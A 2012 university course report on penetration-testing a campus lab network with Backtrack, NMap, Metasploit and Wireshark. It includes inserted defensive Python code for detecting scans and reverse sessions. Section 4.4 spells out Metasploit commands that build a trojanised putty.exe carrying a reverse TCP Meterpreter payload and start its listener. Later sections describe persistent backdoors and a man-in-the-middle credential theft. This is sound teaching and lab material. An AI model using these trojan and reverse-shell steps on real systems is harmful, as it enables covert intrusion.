Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 1 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Security Assessment and Analysis with
Penetration Tools and Wireshark
(Final Draft)
Ryan A. Drozdowski, Mike Hannaford, James Royal
Instructor: Dr. Janusz Zalewski
CNT 4104 Fall 2012 – Networks
Florida Gulf Coast University
Fort Myers, Florida
12-11-2012
1. Introduction
Network security matters whether the network is personal or business: the information on it must not be accessible to unauthorized users, and must not be easy to reach without proper permission. Penetration tools are well suited to testing the security of a network because they are very similar to, and depending on the software the same as, the tools real attackers use. [7] A heavily supported operating system that bundles many penetration tools is Backtrack. Although the project uses only a few of Backtrack's features, many more are available. A good starting tool is NMap, which lets a user map out the configuration and activity of the network and alerts the user to possible security issues. [1] Metasploit is a tool used to perform attacks, also known as exploits, against a particular part of the network. [2] Metasploit can be used to break into a network and do serious damage to a computer on it. Wireshark is an excellent tool for monitoring and analyzing data transfer [6]. As data travels over a wire or a wireless network, Wireshark captures the packets traveling on the network and makes them available to the user through a sophisticated graphical user interface.
This project is an extension of previous class projects that used the three tools Metasploit, NMap, and Wireshark, with the addition of the Backtrack 5 operating system. The following section gives brief introductions to all three tools and then discusses the problem addressed in this project and the methods of its solution.
2. Previous Accomplishments
2.1 Metasploit
The previous project's objective was to install Metasploit on a virtual machine to perform penetration testing. With the virtual machines in place, the main goal was to find vulnerabilities and deliver payloads to those virtual machines. Once that test was complete, the next goal was to test it against the Computer Science lab network to see whether vulnerabilities existed and, if so, exploit them.
The project started with downloading Metasploit and performing basic configuration. The Metasploit application was installed on a Windows 7 x64 platform. During installation of the Metasploit framework, all firewalls and anti-virus software had to be shut down, because penetration-testing software looks like an intruder to the computer it runs on, which may block certain actions.
Oracle's VirtualBox was installed on the same machine as Metasploit. Once VirtualBox was installed, virtual machines running Ubuntu Linux and Windows XP were set up.
The last piece of software installed on the machine was Armitage, a graphical user interface for Metasploit. It makes Metasploit, which is natively a command-line program, much easier to navigate. Armitage was downloaded and configured to work with the Metasploit framework installed on this machine.
Armitage, which automatically activates Metasploit, and the virtual machine running Linux must both be started first. Once both applications are running, penetration testing begins. Armitage is then used to scan the Computer Science lab network, IP address range 69.88.163.0/24, as shown in Figures 2.1.1-2.1.3, to display all machines active on the network.
Figure 2.1.1- Quick Scan. [4]
Figure 2.1.2- Scan range. [4]
Figure 2.1.3 - After a scan of the network. [4]
With all the computers available to attack shown, the virtual machine is running on the local host with IP address 192.168.56.102. The machine's icon can then be right-clicked and scanned from the drop-down menu, as shown in Figure 2.1.5. When the scan completes, all ports identified are shown on the virtual machine, as illustrated in Figure 2.1.6. One can then click Attacks on the task bar, and all the available attacks are shown under the Attacks menu. The exploit tomcat_mgr_deploy can then be selected; a window appears with the attack information, which is checked before selecting Launch, as shown in Figure 2.1.7. This attack launches a Meterpreter session to communicate with the attacked virtual machine. The Armitage user interface displays the attacked machine with lightning bolts, as shown in Figure 2.1.8.
Figure 2.1.4 – Local machine and Metasploitable virtual machine. [4]
Figure 2.1.5 – Drop down menu options for this machine. Select Scan. [4]
Figure 2.1.6 - Services tab for Metasploitable machine. [4]
Figure 2.1.7 - Attack list showing available exploits. [4]
Figure 2.1.8 – Exploited Metasploitable machine.
A similar attack was attempted on the Florida Gulf Coast University Computer Science Lab Network and proved unsuccessful, which leads to the conclusion that the network had no known vulnerabilities at that time. [4] The main goal of the previous project was achieved, but not the secondary goal of penetrating the Computer Science network.
2.2 NMap
The previous project's objective was to use two different applications: first NMap, to detect open ports in the hope of finding vulnerabilities, and second SNORT, an intrusion detection system. With these two applications, the goal was to use NMap to attack a computer on the network while concurrently running SNORT to try to detect the attack performed by NMap.
Since the goal was to use both NMap and SNORT, the project started by attempting to understand the software, both its capabilities and its limitations. Both applications were then given a test run to make sure they behaved as anticipated.
SNORT was the first challenge; custom SNORT detection rules, using a MySQL server, were written. SNORT has a feature that allows a user to write custom detection rules for a particular environment.
How NMap would scan the network was then mapped out, as shown in Figure 2.2.1. NMap is a command-line application with many options, most of which are available on every network or environment.
Figure 2.2.1 NMap plan for attack. [5]
All of this was performed within a virtual environment, with NMap running on Windows 7 and SNORT running on Ubuntu Linux, as shown in Figure 2.2.2. SNORT was started and the custom rules were imported into the system; then the NMap application was started. SNORT, running with its custom rules imported, detected and logged all of NMap's scans, even with NMap's flexibility and custom command-line scans.
Figure 2.2.2 Map of the Network. [5]
The conclusion of this project was that both NMap and SNORT have very useful functionality and flexibility. SNORT could be expanded with a larger set of rules to detect and log far more data, to help prevent intrusions and allow for a more secure network.
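The custom SNORT rules in the previous project caught NMap's scans. The following Python is an added example, not code from the report and not Snort's rule engine; it shows the two checks such rules amount to, run over constructed connection-attempt records: a sliding-window count of distinct destination ports per source/destination pair, which catches a port sweep like the one planned in Figure 2.2.1, and a check for TCP flag combinations that never open a legitimate connection, which catches NMap's NULL, FIN and Xmas probes. The window, threshold, addresses and records are assumptions.

```python
"""Two checks that catch NMap scans, in the spirit of the custom SNORT rules of Section 2.2.

Added example; not code from the original report and not Snort's rule engine.
Run over constructed connection-attempt records: (1) a sliding-window count of
distinct destination ports per source/destination pair catches a port sweep;
(2) TCP flag combinations that never open a legitimate connection catch NMap's
NULL, FIN and Xmas probes. Window, threshold, addresses and records are assumptions.
"""
from collections import defaultdict, deque

SCAN_WINDOW_SEC = 5.0        # assumed: attempts counted over the last 5 seconds
SCAN_PORT_THRESHOLD = 15     # assumed: 15 distinct ports within the window is a sweep
# Flag sets no legitimate TCP stack sends as a connection opener: NULL, FIN-only, Xmas.
ILLEGAL_FLAG_COMBOS = (set(), {"FIN"}, {"FIN", "PSH", "URG"})

# Constructed records: (timestamp, src ip, dst ip, dst port, tcp flags). Not real logs.
SCAN_RECORDS = [(i * 0.05, "69.88.163.15", "69.88.163.240", 1 + i, "SYN") for i in range(30)]
BENIGN_RECORDS = [(3.0, "69.88.163.77", "69.88.163.240", 80, "SYN"),
                  (20.0, "69.88.163.77", "69.88.163.240", 443, "SYN"),
                  (40.0, "69.88.163.77", "69.88.163.240", 22, "SYN")]
PROBE_RECORDS = [(10.0, "69.88.163.15", "69.88.163.240", 445, "FIN,PSH,URG"),
                 (10.1, "69.88.163.15", "69.88.163.240", 445, "")]
SAMPLE_RECORDS = SCAN_RECORDS + BENIGN_RECORDS + PROBE_RECORDS


def detect_scans(records, window=SCAN_WINDOW_SEC, threshold=SCAN_PORT_THRESHOLD):
    """Return (timestamp, src, dst, message) alerts in time order."""
    alerts = []
    recent = defaultdict(deque)     # (src, dst) -> deque of (ts, port) within the window
    already_reported = set()
    for ts, src, dst, port, flags in sorted(records):
        flag_set = set(flags.split(",")) if flags else set()
        if flag_set in ILLEGAL_FLAG_COMBOS:
            alerts.append((ts, src, dst,
                           f"stealth scan probe: flags {flags or 'NULL'} to port {port}"))
        if flag_set != {"SYN"}:
            continue                # only fresh connection attempts count toward a sweep
        q = recent[(src, dst)]
        q.append((ts, port))
        while q and ts - q[0][0] > window:
            q.popleft()             # drop attempts that fell out of the window
        distinct_ports = {p for _, p in q}
        if len(distinct_ports) >= threshold and (src, dst) not in already_reported:
            already_reported.add((src, dst))    # one alert per sweep, not one per port
            alerts.append((ts, src, dst,
                           f"port sweep: {len(distinct_ports)} distinct ports within {window:g}s"))
    return alerts


if __name__ == "__main__":
    for ts, src, dst, msg in detect_scans(SAMPLE_RECORDS):
        print(f"t={ts:6.2f} {src} -> {dst}: {msg}")
```

The sweep detector reports once per source/destination pair, which is how a rule engine keeps a 1000-port scan from producing 1000 alerts; the three benign connections from 69.88.163.77 stay below the threshold because they are spread over 40 seconds.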
2.3 Wireshark
The previous Wireshark project's primary goal was to set up the software on a Windows-based personal computer in the Computer Science lab along with a USB device called AirPcap [3]. The project was more about understanding the software and all its features than about implementing it; some useful data were collected, and the conclusion was drawn that one could effectively tell what was going on over a wireless network.
Wireshark is an open source program downloadable from wireshark.org. One selects the operating system to be used and then selects Download. Along with Wireshark, another piece of software, WinPcap, must also be downloaded and installed. The on-screen prompt asks whether one wishes to install it, so make sure it is selected, as shown in Figure 2.3.1.
Figure 2.3.1 Prompt to download WinPCap. [1]
The next step is to insert the AirPcap USB device. Once inserted, it prompts to download the driver, which must be done to use the software, as shown in Figure 2.3.2. Once all this software has been installed, one can launch Wireshark and sniff packets over a wireless network.
Figure 2.3.2 Prompt to download the AirPcap driver. [1]
With Wireshark running, one must select the AirPcap as the interface; the capture then starts automatically, as shown in Figures 2.3.3-2.3.4. Once running, it was discovered that one could filter the capture by either IP filters or protocol filters. This was used to limit the capture to "cups", that is, packets using the Common Unix Printing System protocol [1], as shown in Figure 2.3.5. After some analysis of the data, Apple computers were singled out, and their IP addresses and printer types were displayed, as shown in Figure 2.3.6.
Figure 2.3.3 Select AirPcap as the interface. [1]
Figure 2.3.4 Sniffing packets over the network. [1]
Figure 2.3.5 The filtered out packets. [1]
Figure 2.3.6 Displays the individual packets with their relevant data. [1]
3. Problem Description
Given the four tools described in the previous section, the plan was to attempt to hack into a computer or embedded system over the Computer Science lab wireless network. Each of the three penetration tools, NMap, Metasploit, and Wireshark, has its own role to play, with the addition of Backtrack [11].
Backtrack's role is to be the intermediary, as it has NMap and Metasploit built into its framework. Because it integrates both programs, it is the top choice for executing the project's attack. Backtrack is installed on the attacking computer, giving access to the penetration tools.
NMap's role is to detect and map out all the computers on the wireless network shown in Figure 3.1. NMap can potentially reveal IP addresses, open ports, closed ports, and the operating system of the machine at a given IP address. This constitutes the first part of the project: mapping out the network.
Figure 3.1 - Computer Science Wireless Network.
Metasploit is then used to create an exploit that disguises an attacking program as a normal program, for example "putty.exe". When this exploit is placed on a USB stick and the user opens it and saves the file, they receive a "putty.exe" file with the exploit embedded. Once "putty.exe" is launched on the user's computer, it functions like the real "putty.exe", but the exploit notifies the attacking computer that the file is up and running. This allows ports to be opened on that machine so that Metasploit can then penetrate it without the user's knowledge and perform attacks against it.
Wireshark is used to monitor the attack and watch the packet exchange. Monitoring can run from the NMap scan, through the exploit being installed, to the attack being performed by Metasploit. The idea is to see whether an attack can be carried out on another device and whether it could be prevented by recognizing certain packet transfers as malicious attacks on the network shown in Figure 3.2.
Figure 3.2 – Map of the Attack over the Network - Computer 1 attacking Computer 2 while
Computer 5 monitors all packet transfer.
4. Preparation
4.1 NMap the CS Network
NMap is used to map out the Computer Science lab's wireless network. The first task is to analyze the network that is going to be attacked, and NMap is well suited to it. The first command the project requires is "nmap -O 69.88.163.0/24", as shown in Figure 4.1. This command lists all systems in the IP address range 69.88.163.0/24 and displays their operating systems. These data can be used to customize an exploit for a specific computer. The one selected was a Windows 7 PC with the IP address 69.88.163.240.
Figure 4.1 Command to display operating systems on the IP range 69.88.163.0/24.
4.2 Running and Setting Up WireShark
Wireshark is set up to monitor the Computer Science network effectively and efficiently. The AirPcap drivers must be installed for this purpose. After installation has completed, the AirPcap is inserted into a USB port and the built-in wireless networking card is turned off. Wireshark is then ready to start, using the AirPcap as the selected sniffing interface. Within several minutes Wireshark captures about 30,000 packets across all the wireless networks in the area, so a display filter is needed to narrow down the recorded packets. The filter "ip.src == 69.88.163.240 || ip.dst == 69.88.163.240", shown in Figure 4.2, sorts through the data and keeps only packets sent to or received from the computer with IP address 69.88.163.240, which is a computer in the Computer Science lab. This filter is then saved in Wireshark's filter list, which allows future monitoring of the planned attacks on a computer on the Computer Science wireless network. The same can be done for the attacking computer.
Figure 4.2 Filtering on IP address 69.88.163.240 as the source or destination.
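The display filter above is Wireshark's own filter language; the Python below is an added example, not code from the report or from the Wireshark project. It implements the small subset of that language the filter uses (the fields ip.src, ip.dst, tcp.srcport, tcp.dstport and tcp.port, the operators == and !=, and the logical operators !, && and ||, with parentheses) and applies it to a constructed packet list that reuses the addresses from Sections 4.1 and 4.4, so one can check offline exactly which packets a filter keeps. It also shows why a misspelled field such as "ip.scr" must be rejected rather than silently matching nothing, which is what Wireshark's filter bar does too. The packet records and the supported subset are assumptions.

```python
"""Apply a Wireshark-style display filter to packet records.

Added example; not code from the original report or from the Wireshark project.
It reproduces how the host filter from Section 4.2 selects packets, for a
constructed packet list. Supported subset (an assumption): fields ip.src, ip.dst,
tcp.srcport, tcp.dstport, tcp.port; operators == and !=; logical !, &&, ||; parentheses.
"""
import re

FIELDS = {"ip.src", "ip.dst", "tcp.srcport", "tcp.dstport", "tcp.port"}
TOKEN_RE = re.compile(r"\s*(\(|\)|&&|\|\||==|!=|!|[A-Za-z_.]+|[0-9.]+)")
HOST_FILTER = "ip.src == 69.88.163.240 || ip.dst == 69.88.163.240"   # the filter from Section 4.2

# Constructed records reusing the report's addresses; not a real capture.
SAMPLE_PACKETS = [
    {"no": 1, "ip.src": "69.88.163.240", "ip.dst": "69.88.163.15", "tcp.srcport": 49321, "tcp.dstport": 5001},
    {"no": 2, "ip.src": "69.88.163.15", "ip.dst": "69.88.163.240", "tcp.srcport": 5001, "tcp.dstport": 49321},
    {"no": 3, "ip.src": "69.88.163.240", "ip.dst": "69.88.163.15", "tcp.srcport": 49321, "tcp.dstport": 5001},
    {"no": 4, "ip.src": "69.88.163.77", "ip.dst": "203.0.113.10", "tcp.srcport": 51000, "tcp.dstport": 80},
    {"no": 5, "ip.src": "203.0.113.10", "ip.dst": "69.88.163.77", "tcp.srcport": 80, "tcp.dstport": 51000},
]


def tokenize(expr):
    """Split a filter string into tokens; anything unrecognised is a syntax error."""
    tokens, pos, expr = [], 0, expr.strip()
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if not m:
            raise ValueError(f"bad filter syntax near {expr[pos:]!r}")
        tokens.append(m.group(1))
        pos = m.end()
    return tokens


class Parser:
    """Recursive descent; ! binds tightest, then &&, then ||, as in Wireshark."""

    def __init__(self, tokens):
        self.tokens, self.i = tokens, 0

    def peek(self):
        return self.tokens[self.i] if self.i < len(self.tokens) else None

    def take(self, expected=None):
        tok = self.peek()
        if tok is None or (expected is not None and tok != expected):
            raise ValueError(f"expected {expected or 'a token'}, got {tok!r}")
        self.i += 1
        return tok

    def parse_or(self):
        node = self.parse_and()
        while self.peek() == "||":
            self.take()
            node = ("or", node, self.parse_and())
        return node

    def parse_and(self):
        node = self.parse_unary()
        while self.peek() == "&&":
            self.take()
            node = ("and", node, self.parse_unary())
        return node

    def parse_unary(self):
        if self.peek() == "!":
            self.take()
            return ("not", self.parse_unary())
        if self.peek() == "(":
            self.take()
            node = self.parse_or()
            self.take(")")
            return node
        field = self.take()
        if field not in FIELDS:      # a typo such as "ip.scr" is an error, not an empty match
            raise ValueError(f"unknown field {field!r}")
        op = self.take()
        if op not in ("==", "!="):
            raise ValueError(f"unsupported operator {op!r}")
        return ("cmp", field, op, self.take())


def field_values(pkt, field):
    """tcp.port matches either endpoint, as it does in Wireshark."""
    if field == "tcp.port":
        return {str(pkt.get("tcp.srcport")), str(pkt.get("tcp.dstport"))}
    return {str(pkt.get(field))}


def evaluate(node, pkt):
    kind = node[0]
    if kind == "cmp":
        _, field, op, value = node
        hit = value in field_values(pkt, field)
        return hit if op == "==" else not hit   # != here means "no endpoint equals"
    if kind == "not":
        return not evaluate(node[1], pkt)
    if kind == "and":
        return evaluate(node[1], pkt) and evaluate(node[2], pkt)
    return evaluate(node[1], pkt) or evaluate(node[2], pkt)


def compile_filter(expr):
    parser = Parser(tokenize(expr))
    tree = parser.parse_or()
    if parser.peek() is not None:
        raise ValueError(f"unexpected token {parser.peek()!r}")
    return lambda pkt: evaluate(tree, pkt)


def filter_is_valid(expr):
    """True when the expression is accepted (Wireshark's filter bar turns red otherwise)."""
    try:
        compile_filter(expr)
        return True
    except ValueError:
        return False


def apply_filter(packets, expr):
    match = compile_filter(expr)
    return [p for p in packets if match(p)]


if __name__ == "__main__":
    for p in apply_filter(SAMPLE_PACKETS, HOST_FILTER):
        print(p["no"], p["ip.src"], "->", p["ip.dst"], "port", p["tcp.dstport"])
```

Running the block keeps packets 1 to 3, the exchange between 69.88.163.240 and the listener, and drops the unrelated web traffic. Validating the filter string before a long capture matters because a rejected filter means every packet is recorded.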
4.3 Backtrack Setup
Backtrack is the operating system used in this project to facilitate the attacks. It is installed on a USB stick so that it can be used on any computer. To launch the operating system, one must first enter the computer's BIOS and change the boot order so that the USB device comes first. Once that is done, the boot screen asks whether to boot from USB. Once the system boots from the USB stick, Backtrack presents its own boot menu; the option to select is the Backtrack persistent text-mode boot. A command prompt then appears, and the desktop is started with "startx". Once it has finished loading, the Backtrack operating system is ready to use, as shown in Figure 4.3.
Figure 4.3 Backtrack desktop screen.
4.4 Customizing an Exploit using Metasploit
Metasploit is a built-in application within the Backtrack operating system. To start Metasploit, one opens a Konsole window and enters the command "msfconsole". This launches the Metasploit console, as shown in Figure 4.4. If at any time one needs help in the Metasploit console, the command "help" can be entered.
Figure 4.4 Metasploit framework.
To create an exploit, one must first know which payload to use. For the project we used NMap and found a Windows 7 PC, so the selected payload was reverse TCP. To load this payload, type "use payload/windows/meterpreter/reverse_tcp", as shown in Figure 4.5. Once the payload is loaded into Metasploit, type "show options" to see what it requires, as shown in Figure 4.6; this shows that LHOST and LPORT must be set. LHOST is the listening computer's IP address and LPORT is the port that computer will listen on. To set LHOST, type "set LHOST 69.88.163.15"; to set LPORT, type "set LPORT 5001" (msfconsole takes the option name and value separated by a space, with no "=" sign). Those are the attributes of our attacking computer. With these properties set, one can create the exploit. The exploit can be attached to any executable; the chosen program was "putty.exe".
To generate this infected program, type "generate -k -t exe -x /tmp/putty.exe -f /tmp/putty_pro.exe", as shown in Figure 4.7. The "-k -t exe" options tell the exploit generator that the program being generated will be an exe. The "-x /tmp/putty.exe" option gives the exploit generator the path of the source file, and "-f /tmp/putty_pro.exe" gives the new executable's name and path. Once the file is created, type "back" to exit the payload menu and return to Metasploit's main menu.
Figure 4.5 Loading the reverse TCP payload.
Figure 4.6 Shows options for the payload.
Figure 4.7 Generates the infected executable.
Now that the exploit has been created, it is time to launch the listener for it. Type "use exploit/multi/handler", as shown in Figure 4.8; this brings up the handler module, where one can listen for the exploit. Once again, one must set both LHOST and LPORT to the IP address and port number selected for the payload, as shown in Figure 4.9. Once that is completed, typing "exploit" launches the listener, as shown in Figure 4.10.
Figure 4.8 Launches the exploit handler.
Figure 4.9 Sets the listening host.
Figure 4.10 Starts to listen for the exploit.
5. Implementation
5.1 Methodology
5.1.1 Reverse TCP
A reverse TCP connection is usually used to bypass firewall restrictions on open ports. A firewall usually blocks inbound connections to ports but does not block outgoing traffic. In a normal forward connection, a client connects to a server through the server's open port; in a reverse connection, the client opens the port and the server connects to it. The most common use of a reverse connection is to bypass firewall and router security restrictions.
5.1.2 Trojan Horse
A Trojan Horse is an executable running on a computer behind a firewall that can open an outgoing connection to an external source. Once the connection is made, one can send commands to that computer.
5.1.3 Man in the Middle
Another benefit of using Backtrack is Ettercap, a piece of software that makes initiating a man-in-the-middle attack easy. A man-in-the-middle attack routes all data packets on the specified network through a chosen computer on that network before sending them on to the Internet. This lets the computer running the attack inspect packets and reroute them as needed.
A malicious example would be users of the network doing their online banking. The person running the man-in-the-middle attack wants the usernames and passwords of every user on the network who tries to reach Bank of America's website. That person would sift through all the data packets on the network and reroute those addressed to Bank of America's IP address to a different destination IP that serves a clone of the Bank of America website. The end user has no knowledge of the reroute and continues to enter their login credentials as usual. Once the user presses the submit button, the attacker has their private information.
5.1.4 Daemon
This project uses Metasploit to generate payloads. Metasploit comes with several payloads to use, and can also generate new ones when needed. This is where daemons come into play. Daemons are background processes in an operating system: scripts or programs that run in the background and are headless, meaning they have no graphical user interface, like a small program running in the operating system that the end user does not see. Daemons can be configured to start when the operating system boots and shut down when it terminates.
This project creates a payload disguised as the open source putty.exe application, an SSH and FTP client. The payload, a customized putty.exe, looks, feels, and executes exactly like the putty.exe downloaded from the Internet. The only difference is that when this generated payload (putty.exe) is opened on the target system, it makes a reverse TCP connection back to the attacking system, which gives the attacking system access to the target. The issue is that the attacking system has access only as long as the payload is running on the target system; once the user of the target system exits the payload, the reverse TCP connection closes.
Daemons make creating a back door into the target system straightforward. A back door is an entry point on the target system through which the user of the attacking system can regain access at any time, which would remove the limitation of our payload described in the previous paragraph. To create a back door on the target system one would need super user privileges on it. This can be achieved with some of the other tools Backtrack provides, but it is out of the scope of this project; the description here only outlines the process. Once one has super user privileges on the target system, one would simply view the processes running on the target.
Our payload runs as a system process on the target system: one process is the true putty.exe application and the other is the reverse TCP connection back to the attacking computer. By creating a daemon, the reverse TCP connection would be activated when the target computer starts and stopped when the system shuts down. One could then access the target system at any time of day, as long as it was turned on, without the need for the payload to be executed.
5.1.5 Exploits and Payloads
Once the best vulnerability in a network has been discovered, a small, specialized computer program called an exploit is used to take advantage of it and give the penetration tester access to the computer system. Exploits are used to deliver payloads to the target system, and the payloads are how the penetration tester gains access to the computer. Payloads are introduced below.
There are over 180 exploits in the Metasploit Framework. Since the security community is encouraged to get involved in the continuing development of exploits, there is a public database of usable exploits, constantly updated by the community; when new exploits are found, they are posted. [4]
Payloads are pieces of code that get executed on the target system as part of an exploit attempt. A payload is usually a sequence of assembly instructions that achieves a specific post-exploitation objective, such as adding a new user to the remote system, or launching a command prompt and binding it to a local port.
Traditionally, payloads were written from scratch or by modifying existing pieces of assembly code, which requires in-depth knowledge not only of assembly programming but also of the internal workings of the target operating system. A number of scripts now allow payloads to be developed without modifying any assembly code at all. The different types of payloads give the penetration tester different degrees of control over the target system. The most commonly used payload is the Meterpreter, which allows the penetration tester to turn on the target system's webcam, take control of the mouse and keyboard, and even take screenshots. All of these options let the penetration tester see exactly what holes there are in the system. Access to key functions on one computer does not necessarily mean control over the whole network, but it is a start in determining which aspects of the network are the most vulnerable. [4]
5.1.6 Backtrack 5
Backtrack Linux is an open source Linux distribution licensed under the GPL. Backtrack is used by network professionals in the industry and is considered the standard operating system for digital forensics and penetration testing. The operating system is named after the well-known backtracking algorithm, and its current version, Backtrack 5 R3, is the version this project uses.
Backtrack comes with Metasploit and NMap fully installed in the standard ISO image, along with many other penetration testing tools, such as Aircrack-ng, which can crack WEP and WPA wireless passwords; Snort, which can sniff packets on a given network; Kismet, an intrusion detection system; Ophcrack, a Windows password cracker that attacks LM hashes with rainbow tables; and Ettercap, which is designed specifically for man-in-the-middle attacks. These are just a handful of the penetration applications that come with Backtrack.
All of these tools are integrated deeply into the operating system, which makes testing a specified network easy. One can install some of these tools on other operating systems, but most of the tools listed here are designed to work best with Backtrack. Anyone who must take on penetration testing of a network is encouraged to use Backtrack Linux as the preferred operating system, since it makes using these programs easy and straightforward without having to customize another operating system for them.
Another benefit of Backtrack is that it is easily installed on a USB drive. Because Backtrack is based on Linux, its hardware requirements are less demanding than those of a standard operating system: Backtrack can run on 512 megabytes of RAM and consumes only about 1 gigabyte of drive space. For this reason one can easily install Backtrack onto a USB drive and boot into it from just about any computer on any network. This also means the operating system can allow someone with malicious intent to take down an enterprise system and destroy or compromise valuable data such as credit card information and private information such as social security numbers, and, with the advancement of GPS systems, even obtain location information when searching for someone with the intent to do bodily harm.
5.2 Testing Experiments
For all the test cases, the preparation described in the previous sections is unchanged: the attacking computer is already in the listening stage and the Wireshark computer is already sniffing.
The assumption is that all the directions in the previous sections have been completed. The experiment uses three computers. The first is the computer running Backtrack and the exploit, with IP address 69.88.163.15. The next is the computer being attacked wirelessly, with IP address 69.88.163.240. The third runs Wireshark to sniff the wireless packets. These three computers are referred to as the exploit computer, the attacked computer and the Wireshark computer. They are all in their respective waiting stages, as shown in Figures 5.1-5.3: the exploit computer is listening at IP 69.88.163.15 on port 5001, the attacked computer is about to click on the putty_pro.exe application, and Wireshark is capturing packets with the filter "ip.src == 69.88.163.240 || ip.dst == 69.88.163.240".
Figure 5.1: Exploit computer listening on IP 69.88.163.15 and port 5001.
Figure 5.2: Attacked computer, with application to be clicked.
Figure 5.3: Wireshark computer sniffing wireless packets with a filter in place.
The first step is to make a connection, so the user at the attacked computer clicks on the "putty_pro.exe" application. Once that has been done, the exploit computer is connected, as shown in Figure 5.4, and Wireshark detects the connection, as shown in Figure 5.5.
Figure 5.4: Exploit computer makes the reverse TCP connection.
Figure 5.5: Wireshark computer sees the packets that make the connection.
Once the connection has been created one can issue commands, all of which can be
found in the Appendix or by typing “?” into the exploit computer. The first command used
by the exploit computer is “ps”, as shown in Figure 5.6. The output lists all the processes
running on the attacked computer. The attacked computer gives no indication that this
command is being executed. Wireshark detects the TCP packets transferred between the
exploit computer and the attacked computer, as shown in Figure 5.7.
Figure 5.6: Exploit computer entering “ps” command showing all processes on the targeted
computer.
Figure 5.7: Wireshark computer shows TCP packets that were captured the moment after the
command “ps”.
With the processes displayed on the exploit computer, one can select a process ID
to kill, as shown in Figure 5.8. The process to be killed is 5040, which is Internet
Explorer on the attacked computer, as shown in Figure 5.9. After typing “kill 5040” on
the exploit computer, as shown in Figure 5.10, Internet Explorer on the attacked
computer closes, as shown in Figure 5.11. Wireshark captures the TCP packets sent to
execute the kill command, as shown in Figure 5.12. This is the end of the experiment.
Figure 5.8: Exploit computer selects the process to kill.
Figure 5.9: Attacked computer has Internet Explorer window open.
Figure 5.10: Exploit computer killing process ID 5040 or Internet Explorer.
Figure 5.11: Attacked computer showing that Internet Explorer was killed by the exploit
computer.
Figure 5.12: Wireshark computer captured the packets moments after the kill command is
executed.
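From the defender's side, the session in Figures 5.4-5.12 has a recognisable shape in a capture: the attacked computer opens the connection itself, to a port nobody expects, and the session then carries payload both ways. The following script is an added example, not part of the report; it applies the report's host filter over constructed tshark-style records for 69.88.163.240 and flags that shape, generalised to any destination port outside an assumed allowlist.

```python
# Added example (not from the report). Records are constructed to mirror the experiment:
# tshark field order frame.time_relative, ip.src, ip.dst, tcp.srcport, tcp.dstport,
# tcp.flags (symbolic), tcp.len. The allowlist and the HTTPS/unrelated rows are assumptions.
from collections import defaultdict

ATTACKED_HOST = "69.88.163.240"
ALLOWED_DST_PORTS = {53, 80, 443}  # assumption: outbound ports this site expects to see

RECORDS = [
    (0.00, "69.88.163.240", "69.88.163.15", 49201, 5001, "SYN", 0),        # victim dials out
    (0.01, "69.88.163.15", "69.88.163.240", 5001, 49201, "SYN,ACK", 0),
    (0.02, "69.88.163.240", "69.88.163.15", 49201, 5001, "ACK", 0),
    (0.50, "69.88.163.15", "69.88.163.240", 5001, 49201, "PSH,ACK", 24),   # operator: ps
    (0.52, "69.88.163.240", "69.88.163.15", 49201, 5001, "PSH,ACK", 1460), # process list
    (9.10, "69.88.163.15", "69.88.163.240", 5001, 49201, "PSH,ACK", 20),   # operator: kill
    (9.12, "69.88.163.240", "69.88.163.15", 49201, 5001, "PSH,ACK", 40),
    (1.00, "69.88.163.240", "93.184.216.34", 49202, 443, "SYN", 0),        # ordinary HTTPS
    (1.02, "93.184.216.34", "69.88.163.240", 443, 49202, "SYN,ACK", 0),
    (1.30, "69.88.163.240", "93.184.216.34", 49202, 443, "PSH,ACK", 517),
    (1.40, "93.184.216.34", "69.88.163.240", 443, 49202, "PSH,ACK", 4000),
    (2.00, "10.0.0.7", "10.0.0.9", 40000, 22, "SYN", 0),                    # not our host
]

def host_filter(records, host=ATTACKED_HOST):
    """Same selection as the report's display filter: ip.src == host || ip.dst == host."""
    return [r for r in records if host in (r[1], r[2])]

def find_reverse_sessions(records, host=ATTACKED_HOST, allowed=ALLOWED_DST_PORTS):
    """Flows the host opened itself (bare SYN) to a non-allowlisted port that then carried
    payload in both directions: the shape of a reverse TCP shell, whatever port it uses.
    Returns (peer, peer_port, bytes_to_peer, bytes_from_peer, last_seen) tuples."""
    flows = defaultdict(lambda: {"initiated": False, "to_peer": 0, "from_peer": 0, "last": 0.0})
    for t, src, dst, sport, dport, flags, length in host_filter(records, host):
        if src == host:                      # key: (peer, peer port, local port)
            f = flows[(dst, dport, sport)]
            f["initiated"] = f["initiated"] or flags == "SYN"
            f["to_peer"] += length
        else:
            f = flows[(src, sport, dport)]
            f["from_peer"] += length
        f["last"] = max(f["last"], t)
    return sorted(
        (peer, port, f["to_peer"], f["from_peer"], f["last"])
        for (peer, port, _local), f in flows.items()
        if f["initiated"] and port not in allowed and f["to_peer"] and f["from_peer"]
    )

if __name__ == "__main__":
    for peer, port, up, down, last in find_reverse_sessions(RECORDS):
        print(f"{ATTACKED_HOST} -> {peer}:{port} sent={up}B recv={down}B active until t={last}s")
```

On these records only the 5001 session is reported; the HTTPS flow is excluded by the allowlist, and a tool listening on an allowlisted port would need a second signal such as the large reply-to-request ratio seen after "ps".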
6. Conclusion
Security assessment and analysis are complex tasks and require complex tools such as
Backtrack, NMap, Metasploit, and Wireshark. NMap is a great tool for preliminary testing, such
as finding a system to attack or just seeing what is on the network, but it offers little beyond
that starting point. Wireshark is a similar tool, since it monitors packets over a wired or
wireless network. It won’t directly tell you anything, but it might alert users to a possible
threat. Backtrack, with the Metasploit framework built in, carries the bulk of the penetration
testing, as it allows one to test and see, for example, whether your antivirus is any good, among
other things. Separately none of these tools would have been as useful, but together they allow
for very practical applications.
The Metasploit exploit succeeded in giving full control over the attacked computer. It
also allowed the viewing of all running processes, after which commands can be used to kill
selected processes. From there other “hacks” may be performed, such as the one described in
Appendix A, which may lead someone to try other exploits. The only limitation of Metasploit is
the user’s knowledge of the network and the systems running on it.
Wireshark yielded some success, but it did not reveal much about the attack on the wireless
computer. What it did show was a great deal of communication between the two computers, as
well as the fact that none of the TCP packets were transmitted at 100%, which should not be the
case in a normal environment. For Wireshark to be used effectively one would need an in-depth
understanding of the network and its behavior; otherwise one would never gather useful
information from all the packets.
Further advancement for this type of project would be to investigate the other exploits
and perhaps find a way to spread the exploit to multiple computers quickly. NMap and
Metasploit have more capabilities than those described in this project. Backtrack also supports
other penetration testing tools, such as Aircrack-ng, which is used to crack WEP and WPA
passwords. Furthermore, other tools, such as Nessus, could be added to expand the project.
